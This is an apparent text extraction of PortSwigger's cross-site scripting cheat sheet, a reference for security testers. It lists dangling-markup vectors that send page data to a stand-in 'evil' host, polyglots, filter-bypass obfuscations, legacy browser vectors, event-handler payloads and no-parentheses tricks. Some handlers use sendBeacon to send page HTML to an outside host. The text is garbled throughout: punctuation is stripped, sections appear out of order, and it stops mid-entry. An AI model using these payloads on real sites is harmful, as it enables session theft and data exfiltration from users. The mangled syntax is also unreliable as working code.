Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
onbeforeunload
Fires after if the url changes ltbody onbeforeunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onbegin
Fires when a svg animation begins ltsvggtltanimate onbegin=alert(1) attributeName=x dur=1sgtCompatibility
onblur
Fires when an element loses focus lta onblur=alert(1) tabindex=1 id=xgtltagtltinput autofocusgtCompatibility
onbounce
Fires when the marquee bounces ltmarquee width=1 loop=1 onbounce=alert(1)gtXSSltmarqueegtCompatibility
oncanplay
Fires if the resource can be played ltaudio oncanplay=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
oncanplaythrough
Fires when enough data has been loadedto play the resource all the way through
ltvideo oncanplaythrough=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt
Compatibility
oncuechange
Fires when subtitle changes ltvideo controlsgtltsource src=validvideomp4 type=videomp4gtlttrack default oncuechange=alert(1) src=datatextvttWEBVTT FILE 1 000000000 --gt 000005000 ltbgtXSSltbgt gtltvideogt
Compatibility
ondeactivate
Fires when the element is deactivated ltxss id=x tabindex=1 ondeactivate=alert(1)gtltxssgtltinput id=y autofocusgtCompatibility
ondurationchange
Fires when duration changes ltaudio controls ondurationchange=alert(1)gtltsource src=validaudiomp3 type=audiompeggtltaudiogt
Compatibility
onend
Fires when a svg animation ends ltsvggtltanimate onend=alert(1) attributeName=x dur=1sgtCompatibility
onended
Fires when the resource is finishedplaying
ltaudio controls autoplay onended=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onerror
Fires when the resource fails to load orcauses an error
ltaudio srconerror=alert(1)gtCompatibility
onfinish
Fires when the marquee finishes ltmarquee width=1 loop=1 onfinish=alert(1)gtXSSltmarqueegtCompatibility
onfocus
Fires when the element has focus lta id=x tabindex=1 onfocus=alert(1)gtltagtCompatibility
onfocusin
Fires when the element has focus lta id=x tabindex=1 onfocusin=alert(1)gtltagtCompatibility
onfocusout
Fires when an element loses focus lta onfocusout=alert(1) tabindex=1 id=xgtltagtltinput autofocusgtCompatibility
onhashchange
Fires if the hash changes ltbody onhashchange=alert(1)gtCompatibility
onload
Fires when the element is loaded ltbody onload=alert(1)gtCompatibility
onloadeddata
Fires when the first frame is loaded ltaudio onloadeddata=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onloadedmetadata
Fires when the meta data is loaded ltaudio autoplay onloadedmetadata=alert(1)gt ltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onloadend
Fires when the element finishes loading ltimage src=validimagepng onloadend=alert(1)gtCompatibility
onloadstart
Fires when the element begins to load ltimage src=validimagepng onloadstart=alert(1)gtCompatibility
onmessage
Fires when message event is receivedfrom a postMessage call
ltbody onmessage=alert(1)gtCompatibility
onpageshow
Fires when the page is shown ltbody onpageshow=alert(1)gtCompatibility
onplay
Fires when the resource is played ltaudio autoplay onplay=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onplaying
Fires the resource is playing ltaudio autoplay onplaying=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpopstate
Fires when the history changes ltbody onpopstate=alert(1)gtCompatibility
onprogress
Fires when the videoaudio beginsdownloading
ltaudio controls onprogress=alert(1)gtltsource src=validaudiomp3 type=audiompeggtltaudiogt
Compatibility
onreadystatechange
Fires when the ready state changes ltapplet onreadystatechange=alert(1)gtltappletgtCompatibility
onrepeat
Fires when a svg animation repeats ltsvggtltanimate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 gtCompatibility
onresize
Fires when the window is resized ltbody onresize=alert(1)gtCompatibility
onscroll
Fires when the page scrolls ltbody onscroll=alert(1)gtltdiv style=height1000pxgtltdivgtltdiv id=xgtltdivgtCompatibility
onstart
Fires when the marquee starts ltmarquee onstart=alert(1)gtXSSltmarqueegtCompatibility
ontimeupdate
Fires when the timeline is changed ltaudio controls autoplay ontimeupdate=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
ontoggle
Fires when the details tag is expanded ltdetails ontoggle=alert(1) opengttestltdetailsgtCompatibility
ontransitioncancel
Fires when a CSS transition cancels ltstylegttarget color redltstylegtltxss id=x style=transitioncolor 10s ontransitioncancel=alert(1)gtltxssgt
Compatibility
ontransitionend
Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionend=alert(1)gtltxssgt
Compatibility
ontransitionrun
Fires when a CSS transition begins ltstylegttarget transform rotate(180deg)ltstylegtltxss id=x style=transitiontransform 2s ontransitionrun=alert(1)gtltxssgt
Compatibility
ontransitionstart
Fires when a CSS transition starts ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionstart=alert(1)gtltxssgt
Compatibility
onunhandledrejection
Fires when a promise isnt handled ltbody onunhandledrejection=alert(1)gtltscriptgtfetch(xyz)ltscriptgtCompatibility
onunload
Fires when the page is unloaded ltbody onunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onwaiting
Fires when while waiting for the data ltvideo autoplay controls onwaiting=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt
Compatibility
onwebkitanimationend
Fires when a CSS animation ends ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationend=alert(1)gtltxssgt
Compatibility
onwebkitanimationiteration
Fires when a CSS animation repeats ltstylegtkeyframes slidein ltstylegtltxss style=animation-duration1sanimation-nameslideinanimation-iteration-count2 onwebkitanimationiteration=alert(1)gtltxssgt
Compatibility
onwebkitanimationstart
Fires when a CSS animation starts ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationstart=alert(1)gtltxssgt
Compatibility
onwebkittransitionend
Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s onwebkittransitionend=alert(1)gtltxssgt
Compatibility
Event handlers that do require user interaction
Event Description Code
onauxclick
Fires when right clicking or using themiddle button of the mouse
ltinput onauxclick=alert(1)gtCompatibility
onbeforecopy
Requires you copy a piece of text lta onbeforecopy=alert(1) contenteditablegttestltagtCompatibility
onbeforecut
Requires you cut a piece of text lta onbeforecut=alert(1) contenteditablegttestltagtCompatibility
onbeforepaste
Requires you paste a piece of text lta onbeforepaste=alert(1) contenteditablegttestltagtCompatibility
onchange
Requires as change of value ltinput onchange=alert(1) value=xssgtCompatibility
onclick
Requires a click of the element ltxss onclick=alert(1)gttestltxssgtCompatibility
onclose
Fires when a dialog is closed ltdialog open onclose=alert(1)gtltform method=dialoggtltbuttongtXSSltbuttongtltformgt
Compatibility
oncontextmenu
Triggered when right clicking to show thecontext menu
ltxss oncontextmenu=alert(1)gttestltxssgtCompatibility
oncopy
Requires you copy a piece of text ltxss oncopy=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
oncut
Requires you cut a piece of text ltxss oncut=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
ondblclick
Triggered when double clicking theelement
ltxss ondblclick=alert(1) autofocus tabindex=1gttestltxssgtCompatibility
ondrag
Triggered dragging the element ltxss draggable=true ondrag=alert(1)gttestltxssgtCompatibility
ondragend
Triggered dragging is finished on theelement
ltxss draggable=true ondragend=alert(1)gttestltxssgtCompatibility
ondragenter
Requires a mouse drag ltxss draggable=true ondragenter=alert(1)gttestltxssgtCompatibility
ondragleave
Requires a mouse drag ltxss draggable=true ondragleave=alert(1)gttestltxssgtCompatibility
ondragover
Triggered dragging over an element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondragover=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
ondragstart
Requires a mouse drag ltxss draggable=true ondragstart=alert(1)gttestltxssgtCompatibility
ondrop
Triggered dropping a draggable element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondrop=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
onfullscreenchange
Fires when a video changes full screenstatus
ltvideo onfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
oninput
Requires as change of value ltinput oninput=alert(1) value=xssgtCompatibility
oninvalid
Requires a form submission with anelement that does not satisfy itsconstraints such as a required attribute
ltformgtltinput oninvalid=alert(1) requiredgtltinput type=submitgtCompatibility
onkeydown
Triggered when a key is pressed ltxss onkeydown=alert(1) contenteditablegttestltxssgtCompatibility
onkeypress
Triggered when a key is pressed ltxss onkeypress=alert(1) contenteditablegttestltxssgtCompatibility
onkeyup
Triggered when a key is released ltxss onkeyup=alert(1) contenteditablegttestltxssgtCompatibility
onmousedown
Triggered when the mouse is pressed ltxss onmousedown=alert(1)gttestltxssgtCompatibility
onmouseenter
Triggered when the mouse is hoveredover the element
ltxss onmouseenter=alert(1)gttestltxssgtCompatibility
onmouseleave
Triggered when the mouse is movedaway from the element
ltxss onmouseleave=alert(1)gttestltxssgtCompatibility
onmousemove
Requires mouse movement ltxss onmousemove=alert(1)gttestltxssgtCompatibility
onmouseout
Triggered when the mouse is movedaway from the element
ltxss onmouseout=alert(1)gttestltxssgtCompatibility
onmouseover
Requires a hover over the element ltxss onmouseover=alert(1)gttestltxssgtCompatibility
onmouseup
Triggered when the mouse button isreleased
ltxss onmouseup=alert(1)gttestltxssgtCompatibility
onmousewheel
Fires when the mousewheel scrolls ltxss onmousewheel=alert(1)gtrequires scrollingCompatibility
onmozfullscreenchange
Fires when a video changes full screenstatus
ltvideo onmozfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
onpagehide
Fires when the page is changed ltbody onpagehide=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onpaste
Requires you paste a piece of text lta onpaste=alert(1) contenteditablegttestltagtCompatibility
onpause
Requires clicking the element to pause ltaudio autoplay controls onpause=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpointerdown
Fires when the mouse down ltxss onpointerdown=alert(1)gtXSSltxssgtCompatibility
onpointerenter
Fires when the mouseenter ltxss onpointerenter=alert(1)gtXSSltxssgtCompatibility
onpointerleave
Fires when the mouseleave ltxss onpointerleave=alert(1)gtXSSltxssgtCompatibility
onpointermove
Fires when the mouse move ltxss onpointermove=alert(1)gtXSSltxssgtCompatibility
onpointerout
Fires when the mouse out ltxss onpointerout=alert(1)gtXSSltxssgtCompatibility
onpointerover
Fires when the mouseover ltxss onpointerover=alert(1)gtXSSltxssgtCompatibility
onpointerrawupdate
Fires when the pointer changes ltxss onpointerrawupdate=alert(1)gtXSSltxssgtCompatibility
onpointerup
Fires when the mouse up ltxss onpointerup=alert(1)gtXSSltxssgtCompatibility
onreset
Requires a click ltform onreset=alert(1)gtltinput type=resetgtCompatibility
onsearch
Fires when a form is submitted and theinput has a type attribute of search
ltformgtltinput type=search onsearch=alert(1) value=Hit return autofocusgtCompatibility
onseeked
Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onseeking
Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onselect
Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility
onselectionchange
Fires when text selection is changed onthe page
ltbody onselectionchange=alert(1)gtselect some textCompatibility
onselectstart
Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility
onshow
Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt
Compatibility
onsubmit
Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility
ontouchend
Fires when the touch screen only mobiledevice
ltbody ontouchend=alert(1)gt Compatibility
ontouchmove
Fires when the touch screen and moveonly mobile device
ltbody ontouchmove=alert(1)gt Compatibility
ontouchstart
Fires when the touch screen only mobiledevice
ltbody ontouchstart=alert(1)gt Compatibility
onvolumechange
Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onwheel
Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility
Restricted characters
No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons
ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons using expressions
ltscriptgtthrow onerror=alert1ltscriptgt
No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt
No parentheses using exception handling and evalon Firefox
ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval
ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval without
ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt
No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt
No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt
No parentheses using template strings ltscriptgtalert`1`ltscriptgt
No parentheses using template strings and locationhash
